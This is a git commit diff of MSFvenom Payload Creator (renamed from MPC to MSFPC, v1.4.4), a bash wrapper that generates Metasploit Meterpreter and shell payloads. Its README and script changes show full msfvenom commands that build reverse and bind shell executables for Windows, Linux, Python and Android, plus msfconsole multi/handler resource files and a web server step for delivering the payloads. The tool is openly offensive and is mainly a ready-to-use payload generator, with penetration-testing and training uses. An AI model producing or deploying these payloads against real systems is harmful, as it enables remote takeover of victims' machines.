v1.4.4: mpc.sh -> msfpc.sh

g0tmi1k · g0tmi1k · commit f648fc308bb5 · 2017-06-09T11:50:59.000+01:00
diff --git a/README.md b/README.md
@@ -1,9 +1,9 @@
-## Msfvenom Payload Creator (MPC)
+## MSFvenom Payload Creator (MSFPC)
 
 A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).
 
 <p align="center">
-  <img src="http://i.imgur.com/rOqMdwp.png" alt="mpc logo"/>
+  <img src="http://i.imgur.com/rOqMdwp.png" alt="msfpc logo"/>
 </p>
 
 
@@ -12,59 +12,68 @@ A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom`
 
 ## About
 
-Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload.
+MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload.
 
-**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_.
+**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MSFPC itself)_.
 The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_).
 
 The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`).
 
 * **Can't remember your IP for a interface? Don't sweat it, just use the interface name**: `eth0`.
-* **Don't know what your external IP is? MPC will discover it**: `wan`.
+* **Don't know what your external IP is? MSFPC will discover it**: `wan`.
 * **Want to generate one of each payload? No issue!** Try: `loop`.
 * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!
 
 _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._
 
-![Msfvenom Payload Creator (MPC)](https://i.imgur.com/qxRwnYD.png)
+![Msfvenom Payload Creator (MSFPC)](https://i.imgur.com/tN9q5iG.png)
 
 
 - - -
 
 
 ## Install
 
-+ Designed for **Kali Linux v2.x** & **Metasploit v4.11+**.
++ Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**.
 + Kali v1.x should work.
 + OSX 10.11+ should work.
 + Weakerth4n 6+ should work.
 + _...nothing else has been tested._
 
 ```
-curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
-chmod +x /usr/bin/mpc
-mpc
+$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
+$ chmod 0755 /usr/local/bin/msfpc
 ```
 
+### Kali-Linux
+
+MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is:
+
+```bash
+root@kali:~# apt install -y msfpc
+```
+
+
 
 - - -
 
 
 ## Help
 
 ```
-root@kali:~# mpc -h -v
- [*] Msfvenom Payload Creator (MPC v1.4)
+$ bash msfpc.sh -h -v
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 
- /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
-   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
-            /usr/bin/mpc elf bind eth0 4444          # Linux, eth0's IP & manual port.
-            /usr/bin/mpc stageless cmd py https      # Python, stageless command prompt.
-            /usr/bin/mpc verbose loop eth1           # A payload for every type, using eth1's IP.
-            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
-            /usr/bin/mpc help verbose                # Help screen, with even more information.
+ msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
+   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
+            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
+            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
+            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
+            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
+            msfpc.sh help verbose                # Help screen, with even more information.
 
  <TYPE>:
+   + APK
    + ASP
    + ASPX
    + Bash [.sh]
@@ -78,7 +87,7 @@ root@kali:~# mpc -h -v
    + Tomcat [.war]
    + Windows [.exe // .dll]
 
- Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
+ Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
  Missing <DOMAIN/IP> will default to the IP menu.
 
  Missing <PORT> will default to 443.
@@ -117,39 +126,38 @@ root@kali:~# mpc -h -v
  <LOOP> will just create one of each <TYPE>.
 
  <VERBOSE> will display more information.
-root@kali:~#
+$
 ```
 
 
 ## Example \#1 (Windows, Fully Automated Using Manual IP)
 
 ```bash
-root@kali:~# bash mpc.sh windows 192.168.1.10
- [*] Msfvenom Payload Creator (MPC v1.4)
+$ bash msfpc.sh windows 192.168.1.10
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
  [i]   IP: 192.168.1.10
  [i] PORT: 443
  [i] TYPE: windows (windows/meterpreter/reverse_tcp)
  [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
   --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
   > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 
- [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
  [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 
  [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
  [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
- [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
+ [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
  [*] Done!
-root@kali:~#
+$
 ```
 
 
 ## Example \#2 (Linux Format, Fully Automated Using Manual Interface and Port)
 
 ```bash
-root@kali:~# ./mpc.sh elf bind eth0 4444 verbose
- [*] Msfvenom Payload Creator (MPC v1.4)
- [i]        IP: 192.168.103.183
+$ ./msfpc.sh elf bind eth0 4444 verbose
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
+ [i]        IP: 192.168.103.142
  [i]      PORT: 4444
  [i]      TYPE: linux (linux/x86/shell/bind_tcp)
  [i]     SHELL: shell
@@ -160,7 +168,6 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose
   --platform linux -a x86 -e generic/none  LPORT=4444 \
   > '/root/linux-shell-staged-bind-tcp-4444.elf'
 
- [i] File (/root/linux-shell-staged-bind-tcp-4444.elf) already exists. Overwriting...
  [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'
 
  [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
@@ -170,39 +177,38 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose
 
  [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
  [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
- [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
+ [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
  [*] Done!
-root@kali:~#
+$
 ```
 
 
 ## Example \#3 (Python Format, Interactive IP Menu)
 
 ```bash
-root@kali:~# mpc stageless cmd py tcp
- [*] Msfvenom Payload Creator (MPC v1.4)
+$ msfpc stageless cmd py tcp
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 
  [i] Use which interface - IP address?:
- [i]   1.) eth0 - 192.168.103.183
- [i]   2.) tap0 - 10.10.100.63
- [i]   3.) lo - 127.0.0.1
- [i]   4.) wan - xxx.xxx.xxx.xxx
- [?] Select 1-4, interface or IP address: 2
+ [i]   1.) eth0 - 192.168.103.142
+ [i]   2.) lo - 127.0.0.1
+ [i]   3.) wan - 31.204.154.174
+ [?] Select 1-3, interface or IP address: 1
 
- [i]   IP: 10.10.100.63
+ [i]   IP: 192.168.103.142
  [i] PORT: 443
  [i] TYPE: python (python/shell_reverse_tcp)
  [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
-  --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 \
+  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
   > '/root/python-shell-stageless-reverse-tcp-443.py'
 
  [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 
  [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
  [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
- [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
+ [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
  [*] Done!
-root@kali:~#
+$
 ```
 
 _Note: Removed WAN IP._
@@ -211,37 +217,39 @@ _Note: Removed WAN IP._
 ## Example \#4 (Loop - Generates one of everything)
 
 ```bash
-root@kali:~# ./mpc.sh loop wan
- [*] Msfvenom Payload Creator (MPC v1.4)
+$ ./msfpc.sh loop wan
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
  [i] Loop Mode. Creating one of each TYPE, with default values
 
- [*] Msfvenom Payload Creator (MPC v1.4)
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
  [i]   IP: xxx.xxx.xxx.xxx
  [i] PORT: 443
- [i] TYPE: windows (windows/meterpreter/reverse_tcp)
- [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f asp \
-  --platform windows -a x86 -e generic/none LHOST=xxx.xxx.xxx.xxx LPORT=443 \
-  > '/root/windows-meterpreter-staged-reverse-tcp-443.asp'
+ [i] TYPE: android (android/meterpreter/reverse_tcp)
+ [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
+  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
+  > '/root/android-meterpreter-stageless-reverse-tcp-443.apk'
 
- [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.asp'
+ [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'
 
- [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc'
- [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc'
- [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
+ [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
+ [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
+ [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
  [*] Done!
 
 
- [*] Msfvenom Payload Creator (MPC v1.4)
+ [*] MSFvenom Payload Creator (MSFPC v1.4.4)
+
 ...SNIP...
+
  [*] Done!
 
-root@kali ~$
+$
 ```
 
 _Note: Removed WAN IP._
 
 
-![Examples](https://i.imgur.com/lQFiqil.png)
+![Examples](https://i.imgur.com/8zPx6p3.png)
 
 
 - - -
diff --git a/msfpc.sh b/msfpc.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 #-Metadata----------------------------------------------------#
-#  Filename: mpc.sh (v1.4.3)             (Update: 2016-06-30) #
+#  Filename: msfpc.sh (v1.4.4)           (Update: 2017-06-09) #
 #-Info--------------------------------------------------------#
 #  Quickly generate Metasploit payloads using msfvenom.       #
 #-Author(s)---------------------------------------------------#
@@ -28,7 +28,7 @@
 #-------------------------------------------------------------#
 
 #--Quick Install----------------------------------------------#
-#  curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc; chmod +x /usr/bin/mpc
+#  curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc
 #-------------------------------------------------------------#
 
 #-More information--------------------------------------------#
@@ -119,30 +119,30 @@ function doAction {
   CMD=$(echo $CMD | sed 's/\\\\\n//g')
 
   [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. ${YELLOW}Overwriting...${RESET}" && rm -f "${FILENAME}"
-  eval "${CMD}" 2>/tmp/mpc.out
+  eval "${CMD}" 2>/tmp/msfpc.out
   [[ ! -s "${FILENAME}" ]] && rm -f "${FILENAME}"
   if [[ -e "${FILENAME}" ]]; then
     echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'"
     echo ""
     \chmod +x "${FILENAME}"
   else
     echo ""
-    \grep -q 'Invalid Payload Selected' /tmp/mpc.out 2>/dev/null
+    \grep -q 'Invalid Payload Selected' /tmp/msfpc.out 2>/dev/null
     if [[ "$?" == '0'  ]]; then
       echo -e "\n ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2
-      \rm -f /tmp/mpc.out
+      \rm -f /tmp/msfpc.out
     else
       echo -e "\n ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2
       echo -e "\n----------------------------------------------------------------------------------------"
       [ -e "/usr/share/metasploit-framework/build_rev.txt" ] && \cat /usr/share/metasploit-framework/build_rev.txt || \msfconsole -v
       \uname -a
       echo -e "----------------------------------------------------------------------------------------${RED}"
-      \cat /tmp/mpc.out
+      \cat /tmp/msfpc.out
       echo -e "${RESET}----------------------------------------------------------------------------------------\n"
     fi
     exit 2
   fi
-  #\rm -f /tmp/mpc.out
+  #\rm -f /tmp/msfpc.out
 
   [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})"
   [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)"
@@ -155,13 +155,15 @@ function doAction {
 
   cat <<EOF > "${FILEHANDLE}"
 #
-# [Kali 2.x]:   systemctl start postgresql; msfdb start; msfconsole -q -r '${FILEHANDLE}'
+# [Kali 1]:   service postgresql start; service metasploit start; msfconsole -q -r '${FILEHANDLE}'
+# [Kali 2.x/Rolling]:   msfdb start; msfconsole -q -r '${FILEHANDLE}'
 #
 use exploit/multi/handler
 set PAYLOAD ${PAYLOAD}
 set ${HOST} ${IP}
 set LPORT ${PORT}
 set ExitOnSession false
+#set AutoRunScript 'post/windows/manage/migrate'
 run -j
 EOF
 
@@ -197,7 +199,7 @@ function doHelp {
   echo -e "   + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]"
   echo -e "   + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET} // .${YELLOW}dll${RESET}]"
   echo ""
-  echo -e " Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address."
+  echo -e " Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address."
   echo -e " Missing <DOMAIN/IP> will default to the IP menu."
   echo ""
   echo -e " Missing <PORT> will default to 443."
@@ -244,7 +246,7 @@ function doHelp {
 
 
 ## Banner
-echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.4.3${RESET})"
+echo -e " ${BLUE}[*]${RESET} ${BLUE}MSF${RESET}venom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MSFPC${RESET} v${BLUE}1.4.4${RESET})"
 
 
 ## Check system
@@ -786,7 +788,7 @@ fi
 
 ##### Done!
 if [[ "${SUCCESS}" == true ]]; then
-  echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python -m SimpleHTTPServer 8080"
+  echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python2 -m SimpleHTTPServer 8080"
   echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!"
 else
   doHelp
